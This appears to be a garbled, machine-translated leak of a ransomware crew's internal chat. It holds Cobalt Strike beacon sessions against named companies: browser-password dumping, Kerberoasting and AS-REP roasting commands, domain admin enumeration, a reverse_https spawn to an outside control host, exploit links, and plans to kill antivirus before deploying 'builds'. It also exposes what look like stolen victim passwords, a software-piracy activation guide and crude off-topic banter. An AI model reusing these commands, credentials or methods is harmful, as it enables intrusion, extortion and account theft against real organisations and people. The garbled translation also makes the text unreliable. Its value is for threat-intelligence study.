``` adazure.app Administrator dhcpadmin.app joomlatest1 joomlatest2 kassabp kassabp.adm macmainw macmainw.adm Nagelr.adm scriptadm.app Troysec.adm usanet.adm ``Yeah, take off sharpwebfirefox the process list and adne thick`` beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpChrome.exe logins /showall --- Chrome Credential (Path: C:\Users\forstern\AppData\Local\Google\Chrome\User Data\Default\Login Data) --- file_path,signon_realm,origin_url,date_created,times_used,username,password C:\Users\forstern\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://editor.vev.design/,https://editor.vev.design/login,9/2/2020 4:11:19 PM,13243551079155078,,Piper16! ``as soon as you check immediately + in the noteproverifybnpmedia.com I also check the rest? without confirmation only 3 users noteFRIVER.LOCAL there is one more appearedvip.pet write here the domain to which to create confona works and glorovnodavshego to salaku what to do in there should not work? works as a tip `` `` shell net group "domain admins" /dom && net group "enterprise admins" /dom && net localgroup administrators ``Can you give us a session?`` Try dotnet brute force or smb login no no it didn't work.``The point of smb through smb_login?`` And what about brute force? beacon> execute-assembly /home/omar/Desktop/Fast-Guide/Net-GPPPassword.exe [*] Tasked beacon to run .NET program: Net-GPPPassword.exe [+] host called home, sent: 114731 bytes [+] received output: Processing files in \GPJ.LOC\sysvol\GPJ.LOC\policies\ ``` I can't get an error, but there's no result, nothing happens. elevate seems to work SharpUp says - yes, guys, the user is a local admin, you can bypass yuacni Net-GPPPassword and winpis won't show it to gpj and won't let it in. 
such pies what haven't tried before now guys try everything from gostpack they don't workvatson shows two vulnerabilitiesrubeus and kerberost doesn't accept domain specified both gpj and gpj.I've tried with Semen to run a brute force attack with sharpshrome, it blames on the domain. what's the problem now? this is not it so progress? 1) Domain Admins. 2) Enterprise Admins 3) Local Admins 4) Ad Info execute-assembly /Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt ``https://habr.com/ru/company/pt/blog/423903/ outputs help does not work with parameter ``kerberoast```` execute-assembly /Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt ``` Dumps all crb hashes, analog of script on ps`31d6cfe0d16ae931b73c59d7e0c089c0` is an empty string, remember! there are no users in AD with such a password, if you see such a ps, then the account is not workingsocreate to telnet,ssh,web,mssql,smb,rdp,vnc`ports 1-1024,3389,5900-6000` why scan such a range? there are 900 empty ports and no mssql? [02]: Fortinet SSL VPN Virtual Ethernet Adapter Connection Name: Ethernet 3 DHCP Enabled: No IP address(es) [01]: 10.59.12.209 [02]: fe80::89c3:6e80:ed9e:ca27 `````` The VPN seemed to be active ``` If his process just hangs there, it does not mean that it is active) ok. will appear - let's try the same as in the classic with cisco clients in generalvpn, I think, was active or LDAP tied there or through the RADIUS is authorizedWe kind of just discussed this point with Fortigate client, the point is that connecting through the Wpn via Fortigate client through the "domain" creeds occurs and connect the machine to the domainTo see the domainConnect through wpn@tl1 , while there is time, can you tell me how to be in the network matches? I can not see the DC there. Any thoughts on this?
Good morning to all:metal:hi Good morning!Good morninggood nightgood nightgood nightdon't forget to ask and help each other and also go home so as long as there are no questions, 20 minutes + I'm talking about sticky notes or something like that tomorrow by 3 so you in the water check their desktop for notes on it2) if there are questions then ask1) take the archive with bills that the password will passthank you)Not before 12 home, I hope you close at least one network)Merry Christmas!Merry Christmas to all!!! Tomorrow by 3:30 workpozapozavlya forgot that yesterday was a holidayWe merry Christmas to all) pure koba! mailsniper works through the sameExchange administrator (i.e. member of "Exchange Organization Administrators" or "Organization Management" group)water path in the same network+- ExchangeOrganization Management in EAC the account with backup access should be in the group in other cases under the tops are directors, chief accountants, etc, If you can't back up everything, it could be that they just have their mail hosted, it's not that easy to download a backup, let me tell you about it.if it's not internal, it's external if there are no mail servers in the network, do we skip it?
in evo have not yet found and it seems that it is not tor the main thing do not forget because in the account is stored information about the sessions, and you can obviously get there through the web1 network 1 account can leave or every time a new registrar?the question you take backups that waymaybe someone else read this dialogue today in #water-way @user8 learned how to download fat files from the network a couple of things who do not know i wait in the groups info from additional tasks as well give out +1 cobu prozapasyasya you will give 2 builds, if you reach the stage of closing you close at your discretion on reports and results in the confusa tomorrow I will not be, work independently on #waterway-com and on #rtpcompany-com finalize + additional tasks + if you remember about the additional tasks on the networks?a couple of announcements so everyone distract yourselves it's waterwaypo rdp hooked up to harper and reading slack#ballymoregroup-com#evo-com#waterway-com #1-done-rtpcompany-com + so I understand we have four networks in operation?:space_invader:space_invader:helloGood evening,good eveningdepo did not come? where did @user7 disappear? unsubscribe @tl1call dap plz, otherwise he again will not answer a couple of shellcodes were sent to him to bypass simantecrelease give me a sign of life that I'm not writing to myself need to urgently make #1-done-rtpcompany-com priority now104.....69 coba there are still alive beacon> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 257 bytes [+] received output: rtpco.local ``but it's old, you need to update all the access info in the confidenc inopnomdidic+user? and so?
i don't see any new sessions in it, i don't see your cobuternicus.com 74.118.138.118demain kobaNo flylel or give me a psh stager i'll throw in my koba want dll@user3 load go) thank you`waterway.com` do the confab please`z3 will be on #wilsonart-com now i'll prepare the second grid to work, who will take over? Yes you can of course still look for cna as an option)can be in the note of each color to assign a symbol :zany_face:as far as I know you can not)to be beautiful? =))))) i think not@tl1 @tl2 in the cob can somehow implement sorting sessions by color.i have no idea what to do with the other session, i can't find it in the configure, it's not a problem.hello there:space_invader:goodnight) until tomorrow) ehGoodnightnightnightnight tomorrow i.e. today goodnight don't forget that tomorrow by 5 tomorrow will be enoughTrust yourself from 5 to 10 if you have 10+ active sessions there slip for min 10 so you don't spam do not forget to clean up good night 150slip to monday for good health)) thank you very much)) tell @user3 not to be late on Mon by 10 am to start closing it yes, Let's make it 10:00 a.m. I guess. they will have an hour at night. do you want it by 10 or on the morning of pnc 4-5 at night on pnc? tomorrow by 6 there is no point in going to work day in general such things on the desktop, a shortcut to disks how to find it? where? on the desktop? chanson mdb database where did you find it? yes we did? if you found access to the center until what time? Taken.
out of 4 sorted out?+@user8 there you got 2 more sessions from that netchat - orenco.com.telecomlabsinc.com input coba, went sessions first took 2 did not take 3 took https pick up yourselves, 4 pieces ready, I'll give them here and you disassemble them yourself, just write down who picked up what on the new sootv pulling from the input above the grid in the work to finish on the old and another announcement, you koba update http://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon input coba https://www.exploit-db.com/exploits/48537 well in general you should look for additional vector and additional task to find this case) in the rep lies only in the rep and the folder in the folder that he opens is the folder ëèççálvot here pay attention to the gif https://github.com/danigargu/CVE-2020-0796 :thinking:but i need to look and there is another option with rce)like on the ms17-010? for goost need a session, no? and one more thing, about dead spots, did you do scans on the smbgost? and today put the buildda ok, let's do a story there and gather information on the offsets avera) but i was there yesterday, i don't know how to check it but i don't know if it's critical, the scale is small and looking for ways to unscramble it) ok then solve the problem with EDR on all servers there are pinged +- 100-80252 machines without a server how many users? 0 Objects returned are there any trusts? 20 pcs....
seriously?)file already if there is not enough buffer length let's make it clear at once that if it fits in the message - write in the message How many servers are there in total? If there are not many you can try to shut down AV by hand, collect analytics on this and we will start with the number of servers. These are most likely the most critical of some @user3 found malware and bitdefender on itc-us.com servers had 4 servers? Or am I confused with another one? Using GPO for Deployment To install SecureAnywhere using GPO, you should have experience with Microsoft's Active Directory and the GPO editor. You can also watch a video on how to use GPOs at How to Deploy Using Group Policy - SecureAnywhere Business. To install SecureAnywhere using GPOs: From the following location, download the SecureAnywhere MSI installer to a network share: http://anywhere.webrootcloudav.com/zerol/wsasme.msi Downloading the file makes it accessible to all endpoints on which you will deploy SecureAnywhere. Go to the server that is the domain controller for the deployment group. Open the GPO editor on the domain controller and create a policy for the deployment group. Assign SecureAnywhere to all endpoints that belong to the Organizational Unit where the Group Policy is created.
SecureAnywhere installs on the endpoints in the group when they restart. ``Two hours we work with these, then there will be new sessionsGood afternoonits-us.com - have pkgprod.com - are what about the sessions?:flag_il:Good morning,good night to you allTomorrow by 3)Good, then we start at 3, the amount of work for tomorrow does not changeI only get out of bed at 14 I think that from now until tonight you have time to prepare the networks for the buildI do not understand is it convenient for you and you sleep before that time?can even earlierWhy at 14? Write to the group on the current networks status tomorrow we need to have two networks ready for the buildtomorrow by 14:00 still an hour working videli a shortcut on your desktop on the web, something to sol ...they seem to have such a system, but it also needs creeds)))) I'm not saying that it does not work at all do not save access to avs in browsers, but in password storage systems? keylogger koba* in sprouselaw from malware account keylogger and got it worked at all? keylogger koba itself is not the most working option in the working except for keylogger, it turns out? they don't save the credentials from av in chrome anywhere keylogger put today on a bunch of machines, as a result keystrokes - roam-away-field as an option - access only in working hours I've already gone through a shitload of machines (where admins sit), no access from anywhere, it seems there are backups going to the cloud if admin not found How to look for cmd version disable on servers, etc in other networks? no about that we did not find the av, admin or do you mean something else? build ehekakoy build?) 
today's build have time to put?)) as a mantra do not forget the session in the slipway all have a good night, then tomorrow before 7 and go to rest then tomorrow we finish you hard) until the state looks like this + this is the domain where we are TECHNISTONE.LOCAL - can't get through, no overlap of users and users/groups from other domains with rights WI.RWP.COM is some kind of a dead domain, just wine 2003 ``` WILSONART.COM + CN.WILSONART.COM + RALPHWILSON.COM + ARBORITE.COM + POLYREY.NET + EU.WILSONART.COM + UK.WILSONART.COM + BUSHBOARD.CO.UK + SLF.LOCAL + RESOPAL.LAN + TECHNISTONE.LOCAL no intersections WI.RWP.COM 2003 mb old/inactive domain POLYREY.COM Quarantined RESOPAL.GER Quarantined ``` found avs, backups, spheres and creeds to us region left backups/spheres in europe Symantec admin pRe1Udlp! dcwas79.Wilsonart.com - vcenter fowlerh@wilsonart.com R3f1nn3j2! ``Give me a brief report on the work so wellWe are looking for creeds from the sphere and avv #wilsonart-com so far no way... of the current credits no admin, no vulnerability on ms17/netapi, at least on the servers, GPPP does not give anything, orbs no quietly how are you doing? 
ok#alloypolymers-com preparing to close, divide themselves on both networks hello all, I will be late tonight and while I will not you work on #wilsonart-com and #alloypolymers-com, good night, tomorrow by 6 to what time?good night to all thank you all for tonight) and until the end of the week for sure #wilsonart-com and tomorrow according to the plans of @user3 network for the closing join me fast, smoothly, clearlyThe first thing to say is that you did great, very good work give me 10 minkeAndruha we have a case, maybe close all the knights?com> go straight on to the next step it's strange that all the functions are affected I can not tell all the same try from another user to spawn from another car) it how respawn not helped work through remotno I would try to respawn try cmd substitute what rights you have? beacon> spawn vew [*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (hitark.com:443) [+] host called home, sent: 840 bytes [-] could not spawn C:\Windows\syswow64\wusa.exe: 740 Try to spawn a new session only one (on one server), nothing to move on all sessions? the same crap on execute-assembly, it doesn't matter what to run... I copied this piece from an attempt to run portcan this what for? why do you need this server? ``` [-] could not spawn C:\Windows\syswow64\wusa.exe: 740 [-] Could not connect to pipe: 2 ``Check through rubeuswow on theoretically related servers ticketpngc - all the credentials are valid, but no one has rights. there are 21 cars on the network and it's servers. Inway is not catching anything yet. The impression is that they all work through RDP.
In addition, they seem to be all virtual machines (but not sure yet - I am checking) #pcsb-org no access to neighboring domains ports are scanned, morphs are checked for nas and other things @user7 and i are digging televisa.com.mx do you have anything to work with so far on your current tasks?will there be new networks today? it seems:man_raising_hand:is the internet working?)hi:space_invader:everyone helloTill tomorrow)thank you, see you tomorrow)don't forget to clean up after yourself,thank you all,good night)so,well,that's it. Today that's all, throw the session in the slip for 100 seconds +-, tomorrow we will continue) when trying to load a non-formed file writes an error (>4Gb) When you remove the ad info, remove the entire, all six files and download the same 6 files in Confra) Files over 50 MB are archived. Files over 200 mb in a compressed state are not downloaded through the cobaDon't forget to delete files created in the process of running commands! Today up to 12 daTo the second group alsoTry to work with her, maybe there faster copeIn the first group coba new session `` [*] Tasked beacon to list processes [+] host called home, sent: 12 bytes [*] Process List with process highlighting [*] Current Running PID: Yellow 892 [*] Explorer/Winlogon: BLUE [*] Admin Tools: LIGHT BLUE [*] Browsers: GREEN [*] AV/EDR: RED ````.` .\[text\]\[text]\[qqq\]\[\url{https://katex.org/}\]sessions are gone༼ つ ◕_◕ ༽つ and what about the task?\{\a'\a'\underline{you yo piraka} doesn't work)\overgroup{Ingeborge Dapkunaite}{and how katya works\overgroup{Ingeborge Dapkunaite}? The mistakes of youth were easy to get away with. Ah, youth, - the magic sound of a whistle. We often sawed off the bough beneath us. Now we are not the same, and the bitches have grown old.
``Thank you at the very bottom of the field``vfhrth````` `````` right here) `````'marker 123 007user1 - charmer, he has a message for me in a personal) + + in pm does not leave a message++All here? hahaI'm cheerfulGreat, who is not with us yet? Let them write in the slack works like everythinghttp://joxi.ru/D2PNv3QUJB5qNrI got a message, but to read it nowhereNo access to the PM we have the rights are cuthttp://joxi.ru/823GVzpTru/823GVzpT8a06L2+1 white screen with all white+also white screen can not? in slek otpisiteen not fit the passwords at 3hi not all can enter-no one came to personal messages? also white screenThere is nothing at all also no field to enter a message? I have a white background, no one personally with me does not open? user8 on this, https://mediaeveryonecom/account/security - encryption E2E and reset the keyI can not write in person, please make me a human nickname Stalinnu me and the user is goodI do not understand what encryption password is required of me if you want uniqueness - Nickname in person)+++ I managed to open kmd but still can not pull in the cob, but managed to pull in ptsh, tomorrow will get all the information and will be untwisteddatax there's a flag -keep, when it gathersaablocks the session process kobydelka new not deleted whytomorrow by 3pick up, sessions in slipskoronu already 12takte guys you threw, no LA-parole not found the LA - admin and tsun-tsunetdo system does not risea, there vpn offu me in koba session what did not help?in tpsh did not fly? psh did not help? yes it's from here? a few pieces i threw out it ...? give me a screenshot of the lk without a VPN have anything to work with? ``` http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx ``` ipn: Sage i have no configs, i've tried everything manually, then i went through SauronEye, it's empty now i'll try it. i thought you were asking about arma or servda) fuck, you mean armitage ?
only arma is available, i can't pull it there try to pull arma, win 10 now i'll try again in pts and arma ? that's my problem this thing was on tasks@user7 you have what on tasks was before? still on the same - need to build dll then to mebug tpsh because of a socket chokeupuponovy stOoOw came as much as three times does not come into it either i read minds, or more details for the question what with ptsh?who needs to bild the shellcode to @user7@user7 was ready to volunteer not raised the sessionWhy? i need a volunteer can generate a new dll? i launch, the process hangs, but the session did not come dll? i can not draw in the coba and ptsh, kmd is closed but opened, does not let you run any exe file today till 12 agreed, in the personal areaa did you order?) do not forget to make me an account in ptsh) check ipn and other stuff `` beacon> shell net group "Domain Admins" /dom [*] Tasked beacon to run: net group "Domain Admins" /dom [+] host called home, sent: 61 bytes [+] received output: 这项请求将在域 WORKGROUP 的域控制器处理。 发生系统错误 1355。 指定的域不存在,或无法联系。 ``` This request will be processed on the domain controller of the WORKGROUP domain. There was a system error 1355. The specified domain does not exist or cannot be contacted. beacon> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 257 bytes ``Domain is not responding there is a session in cobepop)`` on the external domain since they even have passwords repetition the internal one is the same? http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx What domain did you have? Check if there is a pschhe I typoed or what?
If it does not appear, then the socket server has failed and you will not have interactivethe bottom left of the window pops up sockets coopedd when logging in the pschhe who have not noticed the pricholbytnu thin or moderately delayed in 5 characters go or so it also dies?write with your hands and you don't copy it, it stops responding after trying to insert it try to run powershell.it doesn't respondkmda it doesn't write so in general tpsh domain pinged visible or dasgenerate a new one then write with your hands if you don't copypaste the loadpaste what are you trying to do?but the load doesn't paste something i clicked and it's been 5 minutes since then3 item super-duperper? below enter? something on elfiskom if it didn't paste mb not copied3 top after enter+win10?on my car the pcm doesn't work in kmd call the menu on your axis and see what item you have pasted then open cmd on your car I don't think (P) just find out what's in it. notepad.exe >> file >> open >> C:\system32 >> cmd.exe >> pcm >> gcnp right here write back as done@user7 help kmd what's erp, oa? I put everything that was run analogues? peptide*))8ethan.yu peptide1*leon leon20180928no access to directories, too. Of available only mozilla and some little things like Word and Isis.
no shells:thumbsup:@user8 in this case there is something to work with) already told@user3 will tell us there is a variant of loading the script in the memory of the ps itself in the tpc file run is always disabled in fact i will try in the tpc import yet in problems - command, output already said i tried to import ps1 script by rd and run it writes disabled by the admin what does it mean to disable import and run if tpsh arrives? at least i tried to rdp in ps to do itkst, there is a neuter smblogin for ps anyway check hit then most likely already going back timer)no well it's possible, but i think i already made a noise)and when you start to make noise will not come?)polzak is dead, no his files 1) psh on the rpd, you hold a session polzak and if he flies in and sees the open psh and stuff will be unpleasant 2) tpsh can scan hosts by hash, check git@tl1 i can use that dll you gave me yesterday ?@tl1 Give me a clean cryptor devry.edu ``` Coba and arma are not attracted (in all likelihood some iron blocker traffic) Attracted tpsh, but what's the point of it if I have rdp psh attracted msf, raised the system on a virtual machine tried to scan network, session with a route or forwarding almost immediately dies Same with brute force on LA - roth and portfwd kill the session Broot on LA, each time resetting session, there is LA only on the same virutals useless ms17 kills it right away.
I'm in the middle of a stalemate, thank you@user7 ``` https://ucfapps.cloud.com/citrix/storeweb/ je517380@ucf.edu Sawgrass20@ ``@user4 ``` https://studentappst.asu.edu/vpn/index.html egomez34 Pupilo10169! ``Create a group cpcc.eedtsu I'm not there I'm not there all have tasks? everyone hello good evening + + + l1nk@dildoso +LATTS = JordanLATTS@Jordan ?@all please - plus all pentesters here, create a separate channel + + + LATTSJordan = Joobs?I lost my team! Mine ran away (((SAVEllastikjoupson here like@allplease find JobsJobsrgivetHello everyone!)MMAN zdorovaten so all! TASPLhicastgallnixflay zdorovaten HicitrixporovozXENVbushTomfretersecrethewsiJackLincolnmilleniumroket kotorie bil, podvergcay natesky abyzi. welcome in new chat:)hi all! tentstompR1chdildosoJumpernu kuev, ta kuev, correct the mistake, royal pokemon) @grem is it chinese? sev korean aka I thought that's where Silver went !https://www.kinopoisk.ru/series/4742511/` they're making a movie about us. i was offered, i turned it down chinese trojan what's Trickbot ? https://twitter.com/HoldSecurity/status/1492197523120955394 ``baby`` https://xakep.ru/2022/02/21/conti-trickbot/ Who are these people? "Assholes - KCNS Slava all bots and Dimka ! will still work) then the channel in the TH can bang I understand, but maybe) a joke Graeme, just kidding) there cloudflare collect information + is not very friendly with ToreKera here suggests switching to Diskord, go thereDimka! Demeter may know the answer to what month servers with chats paid for?:ping_pong:chpongping try it yourself )that's the way fuck all can@angelo, @nicholas , how do you interpret these changes correctly? I'm certainly an optimist myself, but not that much)) Bitos - 66We'll do it anyway! Gud right!!! People, do not panic.
The Chinese are ahead of us in this sense, and nothing - they go through vpn. And in general, any change for the better, if they are properly interpreted) Garfield certainly will, we are working ahead of the curve In general, we are on the svyazi and are, by any means in ONmitzi, just to add a little light to your forecast. Probably somewhere in the national security strategy there is such a point and a task to act@stanton now look what you mean, yes, I agree, sorry, I got you, calm down, not what you say long domain names But they can probably cut the ISPs' hair for another reason. they kamulitiruyut and can poluchit 1-10a50 bytes / sesno there rate certainly ochen low, you also need to tretenkat with the Chinese, chem there as they go globalPriletaet on site.coma32874128374871234.site.site.comIf ruben he knows, corrects and hints will be for everyone literacy, but he busy@stanton what? I see )as the answer and gets) 53 port is used to respond, packetsOk@manuel google, I do not remember right now, about 15 years ago was, the internet through DNS queriesIn the subdomain you encode the informationHow do you do it in practice?it will be) *through dnsvo, this chat fell offwe got into dns queries when we needed the internet@homerada who cares, our solution should be:disappointed:and add to the protocol standard tcp/ip field with the sender's passport datawe have a task, they work it out, and we should feel comfortablevpn I also think soon in Russia will be killed,garfield is understandable, but colleagues are not very comfortable, need a new solutionNo way to find ... From Europe, my server, where I work, and where the connections to our rocket, all normal! In Novosibirsk, for example, the server there is fucked up, no one can log in for half an hour or shitTor has been hit lately, especially in the RF, get ready guys Golden firewall is waiting for us, if you're in the RF of course) and here's such a dog dog coin.jpgA l_chat like? 
r_chat_normjaba that yes, cooing)Toad will quack that you're in place)Yes probably. And in order not to get a fine rOqueta must often vigil)))I in general, tor browser by itself, and the toad through a blow node on a separate PC in my network, if I have something falls off, so usually something oneNo, it was normal. It's from the nodes, it seems. I have not seen anything strange, seriously, vrozhe everything is okAll of them dropped out? Well, me yesterday was that until I change node, the connection in the rocket did not restoreGabka and qtox via tor work fine.tor may be stupid today norm, yesterday I could not leave unattended at all)I have been falling off, but I do not believe it)seems all normalAll the rocket failed periodically?In the end, beauty, downloaded the wind, the maximum key you specify through the gui, everything, it activated itself)), also normal solution ... If you have your dns-server, you can register a couple of parameters, then the wind themselves will find the server and activated.ourth, it's for vmIn general, the Km network work on the machine that activates, you can not put the server itself on, only on the dedicated to that purpose. It activates the entire line of Windows from 7 to 10 (mb 11), including the server. And office too....To convert retail office into volum is as follows: ``` retail to vl dir ..\root\Licenses16\ProPlus2019VL*.xrm-ms cscript ospp.vbs /inslic:"..\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ppd.xrm-ms" cscript ospp.vbs /inslic:"..\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ul-oob.xrm-ms" cscript ospp.vbs /inslic:"...\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ul.xrm-ms" ``` Next, prescribe the activation of kms-activation through the console.Utility will ask for a key, specify the kms key. 
Office needed google, I do not remember the link to look for ProPlus 2019, somewhere there are links directly to the microsoft site, and there downloaded RetailDownload the wind: go to the site ms, there is MediaCreationTool, download it, it will download the wind, but by default it downloads Evalution, and we need Retail. We need to run the utility as follows: ``` \MediaCreationTool21H1.exe /Eula Accept /Retail /MediaArch x64 /MediaLangCode en-US /MediaEdition Professional \MediaCreationTool21H1.exe /Eula Accept /Retail /MediaArch x86 /MediaLangCode en-US /MediaEdition Enterprise ``` (specify language and version). https://ufile.io/48kbqx5x p!yNONbgyft6Vfrd5cDes4#sea!ws6vde ``` This is the kms server and its source code. Inside the installation script, it simply commands manually in the console (only 3 commands, I do not know why the script does not work). Install the km server on any machine on the network. Then from the other machines prescribe its ip, usually as follows ``` slmgr /ipk FJ82H-XT6CR-J8D7P-XQJJ2-GPDD4 slmgr /skms :1688 slmgr /ato ``` The key is the kms key for the system, the kms keys are publicly available on the ms site. Activated usually volume edition, Evalution - not activated. This kms can activate both winda and office. Office is usually activated as follows: ``` cd c:\Program Files\Microsoft Office\Office15 cscript ospp.vbs /inpkey:soldiers on amphetamines panzer Schocolat you can't mix it with booze it worked like a short circuit and broke down, I slept for 14 hours I remember on New Year's Eve my friends mother put them in beer> and turned them on by hand and the internet provider is the same and the power grid is the same. that's how they got the hacker in yusa. garlic is the important part, right? The most famous are eleuterococcus, rhodiola rosea, astragalus, ginseng and many other herbs. (https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=NejBiHnS3eWGDhEmf) Adaptogens are good for you. 
Who are we to judge them? Jamshut and Ravshan do not want to work! Who has cleaner blood? My favorite skinhead topic is Aryans or Slavs? We are all brothers! I know you're joking! I'm kidding, I even knocked on wood.from 15 to what 16 from 14????? from 14 to 16???? Passport from how come from 14??? how come you can get a passport from 14??? let them walk with walkie-talkieshow do you know how with children per person if you have 6 small children, then what??? you only buy them SIM cards, and yourself Kukish???if you have six small children, you'll only buy sim cards for them and not for yourself? how can i tell you, they actively oppose the population, it's not a big deal to change a VIN. in Ru, laws are bullshit. all operators will have to pass a law that allows them to have only three sim cards. everything must be through public services. I will make a fake, god forbid, you cannot do as you want, i will send myself smileys and be happy because i do not have friends:D how to become elusive joza sticker in facebook give manualvot then straight zaebtsa will not, nihera, need more thick candle such for 200 p put korochee safety, the level of crebs or autostarts so there is no timing attack including them manually i have every toad on different clients or in different sandboxes you turn on one account or go online when you turn on your computer so at least one by one different clients blink so you need to connect them on different torus chains for example all accounts will drop out and connect simultaneously any disconnect, the only thing you need to do is to switch between windows and icons, so you'll have to switch between them all at once and disconnect, when you switch between windows, you have to use ssreenPsi, it goes without saying i don't have one jabberbud like a real hacker the second one or psi+ or mcabber is 4 years old, so you shouldn't touch it at all ?because they can't even fix the icon to hang in the traywhy? 
it's been dead for 10 yearswho uses pidgin? while you're talking a national fairy tale snake green elephant?at least he didn't remember ours, it's like Ru is a movie, like in Schwarzniger) who didn't give birth is a father and there are many more advantages, no one will give a fuck - yes i did it - it's the best kept secret of any man - to get pregnant for a thousand dollars i want a thousand dollars you can't even try to stand upside down maybe i can do it too what do you mean birch tree? ``Does birch, gives bream at once``I had one woman, I did it without rubber, but I didn't inject it... but she was doing "birch" and I don't know what else... she got knocked up... it's an old story) and you were like: stupid, I need more up the ass, let me show you :D at that moment it's a good idea to get a dope so guys, you should take your dicks with you, now I'm hunting for IT guys and my fingers remembered) I slept with a girl, went to the shower, came home, watched her stick her fingers in her vagina with a condom. Said, why, you're a good-looking guy, with dough, and I want a family :D All hail, caffeine drinkers / klofilinski) for sacral knowledge for us fly out without negativity, well, you and schiziki apache already at the gas station fingered us !you guys are full of shit, respect the blue tractor, remember the fuck you've seen too much )so there's no doubt where i sing from youtube and show her the video clip i'll tell mine, i'll tell my cowgirl not to fuck around ![ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=j2bwGSg79tTk89qtr) you just need a divorce) otherwise you could catch a bad trip, and then where the buddha himself leads.now i do not sleep much, and i think a lot. i need to be completely free, relaxed from everyday problems, like some fairs, right? by the way, i heard in the ukr, they allowed light drugs. are you inadequate now?) when will you become adekatic? when will you go mad? 
later, i think so) are you in business? i should check the brain, it's all theory, speculation, what do we know.and doctors say that stupid confusion of images from the subconscious - i do not believe who if anything can fuck up and calm down but you need some trusted person for an hour coming in person saw unimaginable would not want to try lsd people have lived in different worlds under the same lsd by the way for example a good movie circle fuck up is the mandela effect and why wonder, up to likely there may be waves that can read the brain. Let's say it's not uncommon for some people to come up with similar dreams at the same moment, I once went to a high school to write an exam. I was not prepared, I understand that my head is empty. Believe it or not. i got stoned and passed, and i wrote it myself but not everyone has access there's a rumor that in a dream there's some kind of information exchange base and in life there's a fog i try to remember the dream and then i wake up and i'm so cheerful i solve it in my dream i dreamt i fucked over a very hard problem i wonder if i had a vision i was riding on tanks today by the way i found something to read[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=qMpGZSGisdCgF9GE2) and i trusted you so "krebs news" russians are totally fucked up, they are looking for a new functionality in vangine, while i have a coffee, it's for good, not for nothing who will go?and find out the truth of being in a cell with them, then you should also sestibo know that they were in charge of the secrets of the universe, which is not allowed for the wretched, while they went to moscowputin put them in jail you urgently need Mayan shamans ) they will help the church it is worth candles in a church that no one knows but we can learn the truth as for me it is not worth it. Because there are too many unknown variables, which in turn can lead to unhappy consequences. 
The same predisposition to schizophrenia, 4 days without sleep will be the starter of its activity and pussy.in unconsciousnesspopoetically passed out, I do not remember how I no longer slept for 4 daysnu hallucination begins after 3 days already, at least for me so ) 72 hours, and your brain starts to go haywire! It is better not to joke with the head. Here you see the trick, everything is indivisible. I think I will not become a super soldier. Nobody can take it out. Even scientists have proved it. You make great discoveries and it starts to creep when you sleep in that regime. It's a shame to waste time on sleep myself. There is a great scheme, sleep for 4 hours at nightGood morning, everybody! You can't sleep at all, no normal way to restart brain activity has not been found yet, it just happens during sleep. Your problem is solved by sleeping, but before that you need to give up coffee-juice drinks/foods. And sleep.lying on the couch, weakness tin, just heart pounding, you can not get up, but do not want to sleep) thought cheer up I once ate a tablet of caffeine, and energy in the eyes can see the milky way to the morning in obed and evening and not to be addicted to it, I am familiar with it on the cheap something like coke and coffee from it splyumozh redbulb?i'm trying to make something with caffeine i'm trying to make something with caffeine i'm trying to make something with caffeine how's life, not easy?Good morning to all hellojefferson+need to be more peaceful)but it's a desperate phase, when you want to punch a monitor...lagodrom) in addition the engine may be giddy or tinny)) yeah) i call it a state of software when it seems to work (not frozen), but does not work :)))) chewed?)yes, I have a torus jammed, now all is fine, I'll figure it out, thanks) maybe on my side of the problem (return it tomorrow), I will then tomorrow and pour) git lie down that?) thanks for the feedback, all foundSomeone here have worked with RabbitMQ? 
There are a couple of basic questions. Is g5 g15 needed too? g5 g15 left apparently BQ yes? @all guys hi all, who works with g12 g10 and g5 groups please call me back Thanks for the tip without specifying the protocol it is impossible to tell what's in tcp.payload is a layer 4 protocol according to OSI model has anyone tried decoding tcp.payload, is there normal ASCII? stevie {"$binary":"0Yd05GE6/lWShAYtohElX3jD6Hzubyac8Kgutuz4oQVGwPD7SjI9ea5IuzpZkDVc3d7RSsx3nKUubzaNld9YOpM1abL3uGkohvsztaJDc+gppCMpmklHJmskk3GRqAjax5bmJvCoiB9TgsgYRMLKgfYTurkjMQnO054aiI+m7SFb+QKmzUYg5I3kyQCjlHw2ZluSlgrAT2dl3XlPx9btsysFHIGtywYnHb6Ud7UwtuWNPlj4yQ=="} {"$binary":"K5a204/EICWjPyzr+2uFjSdAd8O7REkxjfECJr5rY672qZQZbjRWwyUlVc9bAQNGUpHHguJMW6gnrTB/NS+g8UzvWBwp5YHn0lAuYzRZBrtsCtNrgzhi0EcQNrU94fcaP3OkpvpAJYpkmR/qQz/mk6ox98EBlBtYOFweb8faNCIqckBkF7PcyrHFpNA6FyBl2NnFzUnsLWVWvQ5Tt0Pc6wHgNAEK+yWFYfM="} thanks) admins hello!!! bring jabber back up pls! who's deeper in our ?)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=9Q9Tx3LsgapWCy9TC) What does it need? the one I dumped in pastebin is a head .yml module However, in the definition of the task seems like it should be valid. I tried to put in loop or with_items -- it says, this keyword in the definition of play is not valid all there is a ruben, there all the network @demetrius I sent you a good book on ansible http://pastebin.com/s72GpLJF I've seen, now look again at the good need to make a loop, but can not do it I would someone who wrote a script, there is one and the same fragments stupidly 4 times repeated knows python) Yes, I am the same. Maybe we have someone who is deeper) I only understand in general terms - not too deep Someone I remember answered that they are only strangled / crushed))) Full disclosure comrades who writes in python?
